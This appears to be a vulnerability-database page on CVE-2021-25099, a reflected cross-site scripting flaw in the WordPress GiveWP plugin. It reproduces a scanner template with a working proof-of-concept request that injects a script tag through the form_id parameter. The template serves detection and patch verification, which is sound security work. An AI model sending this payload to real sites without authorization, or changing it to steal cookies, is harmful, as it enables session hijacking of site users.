| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| WordPress 跨站脚本漏洞 | 21 Feb 202200:00 | – | cnnvd | |
| WordPress GiveWP plugin cross-site scripting vulnerability (CNVD-2022-25223) | 23 Feb 202200:00 | – | cnvd | |
| CVE-2021-25099 | 21 Feb 202210:45 | – | cve | |
| CVE-2021-25099 Give < 2.17.3 - Unauthenticated Reflected Cross-Site Scripting | 21 Feb 202210:45 | – | cvelist | |
| EUVD-2021-12011 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-25099 | 21 Feb 202211:15 | – | nvd | |
| WordPress GiveWP Plugin < 2.17.3 Multiple Vulnerabilities | 1 Mar 202200:00 | – | openvas | |
| CVE-2021-25099 | 21 Feb 202211:15 | – | osv | |
| WordPress GiveWP plugin <= 2.17.2 - Unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability | 18 Jan 202200:00 | – | patchstack | |
| Cross site scripting | 21 Feb 202211:15 | – | prion |
id: CVE-2021-25099
info:
name: WordPress GiveWP <2.17.3 - Cross-Site Scripting
author: theamanrawat
severity: medium
description: |
WordPress GiveWP plugin before 2.17.3 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the form_id parameter before returning it in the response of an unauthenticated request via the give_checkout_login AJAX action. An attacker can inject arbitrary script in the browser of a user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
remediation: |
Update to the latest version of the GiveWP plugin (2.17.3 or higher) to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
- https://wordpress.org/plugins/give/
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
- https://plugins.trac.wordpress.org/changeset/2659032
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-25099
cwe-id: CWE-79
epss-score: 0.02145
epss-percentile: 0.79855
cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: givewp
product: givewp
framework: wordpress
tags: cve2021,cve,xss,wp,give,wordpress,wp-plugin,unauth,wpscan,givewp,vuln
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<script>alert(document.domain)</script>")'
- 'contains(body, "give_user_login")'
condition: and
# digest: 4a0a004730450220155e7c400ca4f724cbc2805ca031658ba32a227dbfca7aba21be80b939b2e3a6022100ca4b07f8d00a204ec98544afa1d7064aaf0b07686822feda648fdee5fb08b581:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation